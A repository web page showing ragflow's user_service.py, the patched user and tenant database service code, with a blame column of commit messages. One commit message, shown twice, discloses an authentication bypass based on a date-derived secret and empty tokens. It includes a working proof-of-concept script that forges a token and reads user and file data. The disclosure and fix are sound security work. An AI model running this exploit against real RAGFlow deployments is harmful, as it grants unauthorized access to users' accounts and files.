OpenSource
/
ragflow
关注 4
点赞 0
派生 0
代码 工单 0 合并请求 0 版本发布 33 百科 动态
您最多选择25个主题 主题必须以字母或数字开头,可以包含连字符 (-),并且长度不得超过35个字符
3808 提交
7 分支
分支: Hacked_v0.20.4
分支列表 标签列表
${ item.name }
创建分支 ${ searchTerm }
从 'Hacked_v0.20.4'
${ noResults }
ragflow/api/db/services/user_service.py

user_service.py 10KB
原始文件 永久链接 普通视图 文件历史

build python version rag-flow (#21) * clean rust version project * clean rust version project * build python version rag-flow
1年前
llm configuation refine and trievalTest API refine (#40)
1年前
build python version rag-flow (#21) * clean rust version project * clean rust version project * build python version rag-flow
1年前
Unified user_service.py (#4606) ### What problem does this PR solve? Unified user_service.py ### Type of change - [x] Refactoring
9 个月前
fix user login issue (#85)
1年前
Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998) ### Description There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system. The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls. ### Source - Sink Analysis **Source (User Input):** HTTP Authorization header containing attacker-controlled JWT token **Flow Path:** 1. **Entry Point:** `load_user()` function in `api/apps/__init__.py` (Line 142) 2. **Token Processing:** JWT token extracted from Authorization header 3. **Secret Key Usage:** Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123) 4. **Database Query:** `UserService.query()` called with decoded empty access_token 5. **Sink:** Authentication succeeds, returning first user with empty access_token ### Proof of Concept ```python import requests from datetime import date from itsdangerous.url_safe import URLSafeTimedSerializer import sys def exploit_ragflow(target): # Generate token with predictable key daily_key = str(date.today()) serializer = URLSafeTimedSerializer(secret_key=daily_key) malicious_token = serializer.dumps("") print(f"Target: {target}") print(f"Secret key: {daily_key}") print(f"Generated token: {malicious_token}\n") # Test endpoints endpoints = [ ("/v1/user/info", "User profile"), ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing") ] auth_headers = {"Authorization": malicious_token} for path, description in endpoints: print(f"Testing {description}...") response = requests.get(f"{target}{path}", headers=auth_headers) if response.status_code == 200: data = response.json() if data.get("code") == 0: print(f"SUCCESS {description} accessible") if "user" in path: user_data = data.get("data", {}) print(f" Email: {user_data.get('email')}") print(f" User ID: {user_data.get('id')}") elif "file" in path: files = data.get("data", {}).get("files", []) print(f" Files found: {len(files)}") else: print(f"Access denied") else: print(f"HTTP {response.status_code}") print() if __name__ == "__main__": target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost" exploit_ragflow(target_url) ``` **Exploitation Steps:** 1. Deploy RAGFlow with default configuration 2. Create a user and make at least one user log out (creating empty access_token in database) 3. Run the PoC script against the target 4. Observe successful authentication and data access without any credentials **Version:** 0.19.0 @KevinHuSh @asiroliu @cike8899 Co-authored-by: nkoorty <amalyshau2002@gmail.com>
5 个月前
fix user login issue (#85)
1年前
build python version rag-flow (#21) * clean rust version project * clean rust version project * build python version rag-flow
1年前
add dialog api (#33)
1年前
Fix errors detected by Ruff (#3918) ### What problem does this PR solve? Fix errors detected by Ruff ### Type of change - [x] Refactoring
11 个月前
add dialog api (#33)
1年前
Unified user_service.py (#4606) ### What problem does this PR solve? Unified user_service.py ### Type of change - [x] Refactoring
9 个月前
build python version rag-flow (#21) * clean rust version project * clean rust version project * build python version rag-flow
1年前
Improve API Documentation, Standardize Error Handling, and Enhance Comments (#5990) ### What problem does this PR solve? - The API documentation lacks detailed error code explanations. Added error code tables to `python_api_reference.md` and `http_api_reference.md` to clarify possible error codes and their meanings. - Error handling in the codebase is inconsistent. Standardized error handling logic in `sdk/python/ragflow_sdk/modules/chunk.py`. - Improved API comments by adding standardized docstrings to enhance code readability and maintainability. ### Type of change - [x] Documentation Update - [x] Refactoring
7 个月前
Refa. (#7022) ### What problem does this PR solve? ### Type of change - [x] Refactoring
6 个月前
Improve API Documentation, Standardize Error Handling, and Enhance Comments (#5990) ### What problem does this PR solve? - The API documentation lacks detailed error code explanations. Added error code tables to `python_api_reference.md` and `http_api_reference.md` to clarify possible error codes and their meanings. - Error handling in the codebase is inconsistent. Standardized error handling logic in `sdk/python/ragflow_sdk/modules/chunk.py`. - Improved API comments by adding standardized docstrings to enhance code readability and maintainability. ### Type of change - [x] Documentation Update - [x] Refactoring
7 个月前
Refa. (#7022) ### What problem does this PR solve? ### Type of change - [x] Refactoring
6 个月前
Improve API Documentation, Standardize Error Handling, and Enhance Comments (#5990) ### What problem does this PR solve? - The API documentation lacks detailed error code explanations. Added error code tables to `python_api_reference.md` and `http_api_reference.md` to clarify possible error codes and their meanings. - Error handling in the codebase is inconsistent. Standardized error handling logic in `sdk/python/ragflow_sdk/modules/chunk.py`. - Improved API comments by adding standardized docstrings to enhance code readability and maintainability. ### Type of change - [x] Documentation Update - [x] Refactoring
7 个月前
build python version rag-flow (#21) * clean rust version project * clean rust version project * build python version rag-flow
1年前
Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998) ### Description There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system. The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls. ### Source - Sink Analysis **Source (User Input):** HTTP Authorization header containing attacker-controlled JWT token **Flow Path:** 1. **Entry Point:** `load_user()` function in `api/apps/__init__.py` (Line 142) 2. **Token Processing:** JWT token extracted from Authorization header 3. **Secret Key Usage:** Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123) 4. **Database Query:** `UserService.query()` called with decoded empty access_token 5. **Sink:** Authentication succeeds, returning first user with empty access_token ### Proof of Concept ```python import requests from datetime import date from itsdangerous.url_safe import URLSafeTimedSerializer import sys def exploit_ragflow(target): # Generate token with predictable key daily_key = str(date.today()) serializer = URLSafeTimedSerializer(secret_key=daily_key) malicious_token = serializer.dumps("") print(f"Target: {target}") print(f"Secret key: {daily_key}") print(f"Generated token: {malicious_token}\n") # Test endpoints endpoints = [ ("/v1/user/info", "User profile"), ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing") ] auth_headers = {"Authorization": malicious_token} for path, description in endpoints: print(f"Testing {description}...") response = requests.get(f"{target}{path}", headers=auth_headers) if response.status_code == 200: data = response.json() if data.get("code") == 0: print(f"SUCCESS {description} accessible") if "user" in path: user_data = data.get("data", {}) print(f" Email: {user_data.get('email')}") print(f" User ID: {user_data.get('id')}") elif "file" in path: files = data.get("data", {}).get("files", []) print(f" Files found: {len(files)}") else: print(f"Access denied") else: print(f"HTTP {response.status_code}") print() if __name__ == "__main__": target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost" exploit_ragflow(target_url) ``` **Exploitation Steps:** 1. Deploy RAGFlow with default configuration 2. Create a user and make at least one user log out (creating empty access_token in database) 3. Run the PoC script against the target 4. Observe successful authentication and data access without any credentials **Version:** 0.19.0 @KevinHuSh @asiroliu @cike8899 Co-authored-by: nkoorty <amalyshau2002@gmail.com>
5 个月前
build python version rag-flow (#21) * clean rust version project * clean rust version project * build python version rag-flow
1年前
Improve API Documentation, Standardize Error Handling, and Enhance Comments (#5990) ### What problem does this PR solve? - The API documentation lacks detailed error code explanations. Added error code tables to `python_api_reference.md` and `http_api_reference.md` to clarify possible error codes and their meanings. - Error handling in the codebase is inconsistent. Standardized error handling logic in `sdk/python/ragflow_sdk/modules/chunk.py`. - Improved API comments by adding standardized docstrings to enhance code readability and maintainability. ### Type of change - [x] Documentation Update - [x] Refactoring
7 个月前
Refa. (#7022) ### What problem does this PR solve? ### Type of change - [x] Refactoring
6 个月前
Improve API Documentation, Standardize Error Handling, and Enhance Comments (#5990) ### What problem does this PR solve? - The API documentation lacks detailed error code explanations. Added error code tables to `python_api_reference.md` and `http_api_reference.md` to clarify possible error codes and their meanings. - Error handling in the codebase is inconsistent. Standardized error handling logic in `sdk/python/ragflow_sdk/modules/chunk.py`. - Improved API comments by adding standardized docstrings to enhance code readability and maintainability. ### Type of change - [x] Documentation Update - [x] Refactoring
7 个月前
Refa. (#7022) ### What problem does this PR solve? ### Type of change - [x] Refactoring
6 个月前
Improve API Documentation, Standardize Error Handling, and Enhance Comments (#5990) ### What problem does this PR solve? - The API documentation lacks detailed error code explanations. Added error code tables to `python_api_reference.md` and `http_api_reference.md` to clarify possible error codes and their meanings. - Error handling in the codebase is inconsistent. Standardized error handling logic in `sdk/python/ragflow_sdk/modules/chunk.py`. - Improved API comments by adding standardized docstrings to enhance code readability and maintainability. ### Type of change - [x] Documentation Update - [x] Refactoring
7 个月前
build python version rag-flow (#21) * clean rust version project * clean rust version project * build python version rag-flow
1年前
Improve API Documentation, Standardize Error Handling, and Enhance Comments (#5990) ### What problem does this PR solve? - The API documentation lacks detailed error code explanations. Added error code tables to `python_api_reference.md` and `http_api_reference.md` to clarify possible error codes and their meanings. - Error handling in the codebase is inconsistent. Standardized error handling logic in `sdk/python/ragflow_sdk/modules/chunk.py`. - Improved API comments by adding standardized docstrings to enhance code readability and maintainability. ### Type of change - [x] Documentation Update - [x] Refactoring
7 个月前
Refa. (#7022) ### What problem does this PR solve? ### Type of change - [x] Refactoring
6 个月前
Improve API Documentation, Standardize Error Handling, and Enhance Comments (#5990) ### What problem does this PR solve? - The API documentation lacks detailed error code explanations. Added error code tables to `python_api_reference.md` and `http_api_reference.md` to clarify possible error codes and their meanings. - Error handling in the codebase is inconsistent. Standardized error handling logic in `sdk/python/ragflow_sdk/modules/chunk.py`. - Improved API comments by adding standardized docstrings to enhance code readability and maintainability. ### Type of change - [x] Documentation Update - [x] Refactoring
7 个月前
Refa. (#7022) ### What problem does this PR solve? ### Type of change - [x] Refactoring
6 个月前
Improve API Documentation, Standardize Error Handling, and Enhance Comments (#5990) ### What problem does this PR solve? - The API documentation lacks detailed error code explanations. Added error code tables to `python_api_reference.md` and `http_api_reference.md` to clarify possible error codes and their meanings. - Error handling in the codebase is inconsistent. Standardized error handling logic in `sdk/python/ragflow_sdk/modules/chunk.py`. - Improved API comments by adding standardized docstrings to enhance code readability and maintainability. ### Type of change - [x] Documentation Update - [x] Refactoring
7 个月前
build python version rag-flow (#21) * clean rust version project * clean rust version project * build python version rag-flow
1年前
apply pep8 formalize (#155)
1年前
fix user login issue (#85)
1年前
build python version rag-flow (#21) * clean rust version project * clean rust version project * build python version rag-flow
1年前
apply pep8 formalize (#155)
1年前
build python version rag-flow (#21) * clean rust version project * clean rust version project * build python version rag-flow
1年前
fix user login issue (#85)
1年前
apply pep8 formalize (#155)
1年前
build python version rag-flow (#21) * clean rust version project * clean rust version project * build python version rag-flow
1年前
Improve API Documentation, Standardize Error Handling, and Enhance Comments (#5990) ### What problem does this PR solve? - The API documentation lacks detailed error code explanations. Added error code tables to `python_api_reference.md` and `http_api_reference.md` to clarify possible error codes and their meanings. - Error handling in the codebase is inconsistent. Standardized error handling logic in `sdk/python/ragflow_sdk/modules/chunk.py`. - Improved API comments by adding standardized docstrings to enhance code readability and maintainability. ### Type of change - [x] Documentation Update - [x] Refactoring
7 个月前
Refa. (#7022) ### What problem does this PR solve? ### Type of change - [x] Refactoring
6 个月前
Improve API Documentation, Standardize Error Handling, and Enhance Comments (#5990) ### What problem does this PR solve? - The API documentation lacks detailed error code explanations. Added error code tables to `python_api_reference.md` and `http_api_reference.md` to clarify possible error codes and their meanings. - Error handling in the codebase is inconsistent. Standardized error handling logic in `sdk/python/ragflow_sdk/modules/chunk.py`. - Improved API comments by adding standardized docstrings to enhance code readability and maintainability. ### Type of change - [x] Documentation Update - [x] Refactoring
7 个月前
Refa. (#7022) ### What problem does this PR solve? ### Type of change - [x] Refactoring
6 个月前
Improve API Documentation, Standardize Error Handling, and Enhance Comments (#5990) ### What problem does this PR solve? - The API documentation lacks detailed error code explanations. Added error code tables to `python_api_reference.md` and `http_api_reference.md` to clarify possible error codes and their meanings. - Error handling in the codebase is inconsistent. Standardized error handling logic in `sdk/python/ragflow_sdk/modules/chunk.py`. - Improved API comments by adding standardized docstrings to enhance code readability and maintainability. ### Type of change - [x] Documentation Update - [x] Refactoring
7 个月前
build python version rag-flow (#21) * clean rust version project * clean rust version project * build python version rag-flow
1年前
add API for tenant function (#2866) ### What problem does this PR solve? feat: API access key management https://github.com/infiniflow/ragflow/issues/2846 feat: Render markdown file with remark-loader https://github.com/infiniflow/ragflow/issues/2846 ### Type of change - [x] New Feature (non-breaking change which adds functionality)
1年前
apply pep8 formalize (#155)
1年前
add rerank model (#969) ### What problem does this PR solve? feat: add rerank models to the project #724 #162 ### Type of change - [x] New Feature (non-breaking change which adds functionality)
1年前
apply pep8 formalize (#155)
1年前
add tts api (#2107) ### What problem does this PR solve? add tts api - [x] New Feature (non-breaking change which adds functionality) --------- Co-authored-by: Zhedong Cen <cenzhedong2@126.com> Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
1年前
apply pep8 formalize (#155)
1年前
add API for tenant function (#2866) ### What problem does this PR solve? feat: API access key management https://github.com/infiniflow/ragflow/issues/2846 feat: Render markdown file with remark-loader https://github.com/infiniflow/ragflow/issues/2846 ### Type of change - [x] New Feature (non-breaking change which adds functionality)
1年前
apply pep8 formalize (#155)
1年前
build python version rag-flow (#21) * clean rust version project * clean rust version project * build python version rag-flow
1年前
apply pep8 formalize (#155)
1年前
add API for tenant function (#2866) ### What problem does this PR solve? feat: API access key management https://github.com/infiniflow/ragflow/issues/2846 feat: Render markdown file with remark-loader https://github.com/infiniflow/ragflow/issues/2846 ### Type of change - [x] New Feature (non-breaking change which adds functionality)
1年前
apply pep8 formalize (#155)
1年前
build python version rag-flow (#21) * clean rust version project * clean rust version project * build python version rag-flow
1年前
remove unused codes, seperate layout detection out as a new api. Add new rag methed 'table' (#55)
1年前
apply pep8 formalize (#155)
1年前
Refactor. (#4612) ### What problem does this PR solve? ### Type of change - [x] Refactoring
9 个月前
build python version rag-flow (#21) * clean rust version project * clean rust version project * build python version rag-flow
1年前
Improve API Documentation, Standardize Error Handling, and Enhance Comments (#5990) ### What problem does this PR solve? - The API documentation lacks detailed error code explanations. Added error code tables to `python_api_reference.md` and `http_api_reference.md` to clarify possible error codes and their meanings. - Error handling in the codebase is inconsistent. Standardized error handling logic in `sdk/python/ragflow_sdk/modules/chunk.py`. - Improved API comments by adding standardized docstrings to enhance code readability and maintainability. ### Type of change - [x] Documentation Update - [x] Refactoring
7 个月前
Refa. (#7022) ### What problem does this PR solve? ### Type of change - [x] Refactoring
6 个月前
Improve API Documentation, Standardize Error Handling, and Enhance Comments (#5990) ### What problem does this PR solve? - The API documentation lacks detailed error code explanations. Added error code tables to `python_api_reference.md` and `http_api_reference.md` to clarify possible error codes and their meanings. - Error handling in the codebase is inconsistent. Standardized error handling logic in `sdk/python/ragflow_sdk/modules/chunk.py`. - Improved API comments by adding standardized docstrings to enhance code readability and maintainability. ### Type of change - [x] Documentation Update - [x] Refactoring
7 个月前
Refa. (#7022) ### What problem does this PR solve? ### Type of change - [x] Refactoring
6 个月前
Improve API Documentation, Standardize Error Handling, and Enhance Comments (#5990) ### What problem does this PR solve? - The API documentation lacks detailed error code explanations. Added error code tables to `python_api_reference.md` and `http_api_reference.md` to clarify possible error codes and their meanings. - Error handling in the codebase is inconsistent. Standardized error handling logic in `sdk/python/ragflow_sdk/modules/chunk.py`. - Improved API comments by adding standardized docstrings to enhance code readability and maintainability. ### Type of change - [x] Documentation Update - [x] Refactoring
7 个月前
build python version rag-flow (#21) * clean rust version project * clean rust version project * build python version rag-flow
1年前
Refa. (#7022) ### What problem does this PR solve? ### Type of change - [x] Refactoring
6 个月前
build python version rag-flow (#21) * clean rust version project * clean rust version project * build python version rag-flow
1年前
feat: add api of tenant app (#2177) ### What problem does this PR solve? add api of tenant app ### Type of change - [x] New Feature (non-breaking change which adds functionality)
1年前
Refa. (#7022) ### What problem does this PR solve? ### Type of change - [x] Refactoring
6 个月前
feat: add api of tenant app (#2177) ### What problem does this PR solve? add api of tenant app ### Type of change - [x] New Feature (non-breaking change which adds functionality)
1年前
add API for tenant function (#2866) ### What problem does this PR solve? feat: API access key management https://github.com/infiniflow/ragflow/issues/2846 feat: Render markdown file with remark-loader https://github.com/infiniflow/ragflow/issues/2846 ### Type of change - [x] New Feature (non-breaking change which adds functionality)
1年前
feat: add api of tenant app (#2177) ### What problem does this PR solve? add api of tenant app ### Type of change - [x] New Feature (non-breaking change which adds functionality)
1年前
add API for tenant function (#2866) ### What problem does this PR solve? feat: API access key management https://github.com/infiniflow/ragflow/issues/2846 feat: Render markdown file with remark-loader https://github.com/infiniflow/ragflow/issues/2846 ### Type of change - [x] New Feature (non-breaking change which adds functionality)
1年前
feat: add api of tenant app (#2177) ### What problem does this PR solve? add api of tenant app ### Type of change - [x] New Feature (non-breaking change which adds functionality)
1年前
add API for tenant function (#2866) ### What problem does this PR solve? feat: API access key management https://github.com/infiniflow/ragflow/issues/2846 feat: Render markdown file with remark-loader https://github.com/infiniflow/ragflow/issues/2846 ### Type of change - [x] New Feature (non-breaking change which adds functionality)
1年前
feat: add api of tenant app (#2177) ### What problem does this PR solve? add api of tenant app ### Type of change - [x] New Feature (non-breaking change which adds functionality)
1年前
add API for tenant function (#2866) ### What problem does this PR solve? feat: API access key management https://github.com/infiniflow/ragflow/issues/2846 feat: Render markdown file with remark-loader https://github.com/infiniflow/ragflow/issues/2846 ### Type of change - [x] New Feature (non-breaking change which adds functionality)
1年前
Refa. (#7022) ### What problem does this PR solve? ### Type of change - [x] Refactoring
6 个月前
 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277 
  1. #

  2. #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.

  3. #

  4. #  Licensed under the Apache License, Version 2.0 (the "License");

  5. #  you may not use this file except in compliance with the License.

  6. #  You may obtain a copy of the License at

  7. #

  8. #      http://www.apache.org/licenses/LICENSE-2.0

  9. #

  10. #  Unless required by applicable law or agreed to in writing, software

  11. #  distributed under the License is distributed on an "AS IS" BASIS,

  12. #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.

  13. #  See the License for the specific language governing permissions and

  14. #  limitations under the License.

  15. #

  16. import hashlib

  17. from datetime import datetime

  18. import logging

  19. 

  20. import peewee

  21. from werkzeug.security import generate_password_hash, check_password_hash

  22. 

  23. from api.db import UserTenantRole

  24. from api.db.db_models import DB, UserTenant

  25. from api.db.db_models import User, Tenant

  26. from api.db.services.common_service import CommonService

  27. from api.utils import get_uuid, current_timestamp, datetime_format

  28. from api.db import StatusEnum

  29. from rag.settings import MINIO

  30. 

  31. 

  32. class UserService(CommonService):

  33.     """Service class for managing user-related database operations.

  34. 

  35.     This class extends CommonService to provide specialized functionality for user management,

  36.     including authentication, user creation, updates, and deletions.

  37. 

  38.     Attributes:

  39.         model: The User model class for database operations.

  40.     """

  41.     model = User

  42. 

  43.     @classmethod

  44.     @DB.connection_context()

  45.     def query(cls, cols=None, reverse=None, order_by=None, **kwargs):

  46.         if 'access_token' in kwargs:

  47.             access_token = kwargs['access_token']

  48.             

  49.             # Reject empty, None, or whitespace-only access tokens

  50.             if not access_token or not str(access_token).strip():

  51.                 logging.warning("UserService.query: Rejecting empty access_token query")

  52.                 return cls.model.select().where(cls.model.id == "INVALID_EMPTY_TOKEN")  # Returns empty result

  53.             

  54.             # Reject tokens that are too short (should be UUID, 32+ chars)

  55.             if len(str(access_token).strip()) < 32:

  56.                 logging.warning(f"UserService.query: Rejecting short access_token query: {len(str(access_token))} chars")

  57.                 return cls.model.select().where(cls.model.id == "INVALID_SHORT_TOKEN")  # Returns empty result

  58.             

  59.             # Reject tokens that start with "INVALID_" (from logout)

  60.             if str(access_token).startswith("INVALID_"):

  61.                 logging.warning("UserService.query: Rejecting invalidated access_token")

  62.                 return cls.model.select().where(cls.model.id == "INVALID_LOGOUT_TOKEN")  # Returns empty result

  63.         

  64.         # Call parent query method for valid requests

  65.         return super().query(cols=cols, reverse=reverse, order_by=order_by, **kwargs)

  66. 

  67.     @classmethod

  68.     @DB.connection_context()

  69.     def filter_by_id(cls, user_id):

  70.         """Retrieve a user by their ID.

  71. 

  72.         Args:

  73.             user_id: The unique identifier of the user.

  74. 

  75.         Returns:

  76.             User object if found, None otherwise.

  77.         """

  78.         try:

  79.             user = cls.model.select().where(cls.model.id == user_id).get()

  80.             return user

  81.         except peewee.DoesNotExist:

  82.             return None

  83. 

  84.     @classmethod

  85.     @DB.connection_context()

  86.     def query_user(cls, email, password):

  87.         """Authenticate a user with email and password.

  88. 

  89.         Args:

  90.             email: User's email address.

  91.             password: User's password in plain text.

  92. 

  93.         Returns:

  94.             User object if authentication successful, None otherwise.

  95.         """

  96.         user = cls.model.select().where((cls.model.email == email),

  97.                                         (cls.model.status == StatusEnum.VALID.value)).first()

  98.         if user and check_password_hash(str(user.password), password):

  99.             return user

  100.         else:

  101.             return None

  102. 

  103.     @classmethod

  104.     @DB.connection_context()

  105.     def save(cls, **kwargs):

  106.         if "id" not in kwargs:

  107.             kwargs["id"] = get_uuid()

  108.         if "password" in kwargs:

  109.             kwargs["password"] = generate_password_hash(

  110.                 str(kwargs["password"]))

  111. 

  112.         kwargs["create_time"] = current_timestamp()

  113.         kwargs["create_date"] = datetime_format(datetime.now())

  114.         kwargs["update_time"] = current_timestamp()

  115.         kwargs["update_date"] = datetime_format(datetime.now())

  116.         obj = cls.model(**kwargs).save(force_insert=True)

  117.         return obj

  118. 

  119.     @classmethod

  120.     @DB.connection_context()

  121.     def delete_user(cls, user_ids, update_user_dict):

  122.         with DB.atomic():

  123.             cls.model.update({"status": 0}).where(

  124.                 cls.model.id.in_(user_ids)).execute()

  125. 

  126.     @classmethod

  127.     @DB.connection_context()

  128.     def update_user(cls, user_id, user_dict):

  129.         with DB.atomic():

  130.             if user_dict:

  131.                 user_dict["update_time"] = current_timestamp()

  132.                 user_dict["update_date"] = datetime_format(datetime.now())

  133.                 cls.model.update(user_dict).where(

  134.                     cls.model.id == user_id).execute()

  135. 

  136. 

  137. class TenantService(CommonService):

  138.     """Service class for managing tenant-related database operations.

  139. 

  140.     This class extends CommonService to provide functionality for tenant management,

  141.     including tenant information retrieval and credit management.

  142. 

  143.     Attributes:

  144.         model: The Tenant model class for database operations.

  145.     """

  146.     model = Tenant

  147. 

  148.     @classmethod

  149.     @DB.connection_context()

  150.     def get_info_by(cls, user_id):

  151.         fields = [

  152.             cls.model.id.alias("tenant_id"),

  153.             cls.model.name,

  154.             cls.model.llm_id,

  155.             cls.model.embd_id,

  156.             cls.model.rerank_id,

  157.             cls.model.asr_id,

  158.             cls.model.img2txt_id,

  159.             cls.model.tts_id,

  160.             cls.model.parser_ids,

  161.             UserTenant.role]

  162.         return list(cls.model.select(*fields)

  163.                     .join(UserTenant, on=((cls.model.id == UserTenant.tenant_id) & (UserTenant.user_id == user_id) & (UserTenant.status == StatusEnum.VALID.value) & (UserTenant.role == UserTenantRole.OWNER)))

  164.                     .where(cls.model.status == StatusEnum.VALID.value).dicts())

  165. 

  166.     @classmethod

  167.     @DB.connection_context()

  168.     def get_joined_tenants_by_user_id(cls, user_id):

  169.         fields = [

  170.             cls.model.id.alias("tenant_id"),

  171.             cls.model.name,

  172.             cls.model.llm_id,

  173.             cls.model.embd_id,

  174.             cls.model.asr_id,

  175.             cls.model.img2txt_id,

  176.             UserTenant.role]

  177.         return list(cls.model.select(*fields)

  178.                     .join(UserTenant, on=((cls.model.id == UserTenant.tenant_id) & (UserTenant.user_id == user_id) & (UserTenant.status == StatusEnum.VALID.value) & (UserTenant.role == UserTenantRole.NORMAL)))

  179.                     .where(cls.model.status == StatusEnum.VALID.value).dicts())

  180. 

  181.     @classmethod

  182.     @DB.connection_context()

  183.     def decrease(cls, user_id, num):

  184.         num = cls.model.update(credit=cls.model.credit - num).where(

  185.             cls.model.id == user_id).execute()

  186.         if num == 0:

  187.             raise LookupError("Tenant not found which is supposed to be there")

  188. 

  189.     @classmethod

  190.     @DB.connection_context()

  191.     def user_gateway(cls, tenant_id):

  192.         hashobj = hashlib.sha256(tenant_id.encode("utf-8"))

  193.         return int(hashobj.hexdigest(), 16)%len(MINIO)

  194. 

  195. 

  196. class UserTenantService(CommonService):

  197.     """Service class for managing user-tenant relationship operations.

  198. 

  199.     This class extends CommonService to handle the many-to-many relationship

  200.     between users and tenants, managing user roles and tenant memberships.

  201. 

  202.     Attributes:

  203.         model: The UserTenant model class for database operations.

  204.     """

  205.     model = UserTenant

  206. 

  207.     @classmethod

  208.     @DB.connection_context()

  209.     def filter_by_id(cls, user_tenant_id):

  210.         try:

  211.             user_tenant = cls.model.select().where((cls.model.id == user_tenant_id) & (cls.model.status == StatusEnum.VALID.value)).get()

  212.             return user_tenant

  213.         except peewee.DoesNotExist:

  214.             return None

  215. 

  216.     @classmethod

  217.     @DB.connection_context()

  218.     def save(cls, **kwargs):

  219.         if "id" not in kwargs:

  220.             kwargs["id"] = get_uuid()

  221.         obj = cls.model(**kwargs).save(force_insert=True)

  222.         return obj

  223. 

  224.     @classmethod

  225.     @DB.connection_context()

  226.     def get_by_tenant_id(cls, tenant_id):

  227.         fields = [

  228.             cls.model.id,

  229.             cls.model.user_id,

  230.             cls.model.status,

  231.             cls.model.role,

  232.             User.nickname,

  233.             User.email,

  234.             User.avatar,

  235.             User.is_authenticated,

  236.             User.is_active,

  237.             User.is_anonymous,

  238.             User.status,

  239.             User.update_date,

  240.             User.is_superuser]

  241.         return list(cls.model.select(*fields)

  242.                     .join(User, on=((cls.model.user_id == User.id) & (cls.model.status == StatusEnum.VALID.value) & (cls.model.role != UserTenantRole.OWNER)))

  243.                     .where(cls.model.tenant_id == tenant_id)

  244.                     .dicts())

  245. 

  246.     @classmethod

  247.     @DB.connection_context()

  248.     def get_tenants_by_user_id(cls, user_id):

  249.         fields = [

  250.             cls.model.tenant_id,

  251.             cls.model.role,

  252.             User.nickname,

  253.             User.email,

  254.             User.avatar,

  255.             User.update_date

  256.         ]

  257.         return list(cls.model.select(*fields)

  258.                     .join(User, on=((cls.model.tenant_id == User.id) & (UserTenant.user_id == user_id) & (UserTenant.status == StatusEnum.VALID.value)))

  259.                     .where(cls.model.status == StatusEnum.VALID.value).dicts())

  260. 

  261.     @classmethod

  262.     @DB.connection_context()

  263.     def get_num_members(cls, user_id: str):

  264.         cnt_members = cls.model.select(peewee.fn.COUNT(cls.model.id)).where(cls.model.tenant_id == user_id).scalar()

  265.         return cnt_members

  266. 

  267.     @classmethod

  268.     @DB.connection_context()

  269.     def filter_by_tenant_and_user_id(cls, tenant_id, user_id):

  270.         try:

  271.             user_tenant = cls.model.select().where(

  272.                 (cls.model.tenant_id == tenant_id) & (cls.model.status == StatusEnum.VALID.value) &

  273.                 (cls.model.user_id == user_id)

  274.             ).first()

  275.             return user_tenant

  276.         except peewee.DoesNotExist:

  277.             return None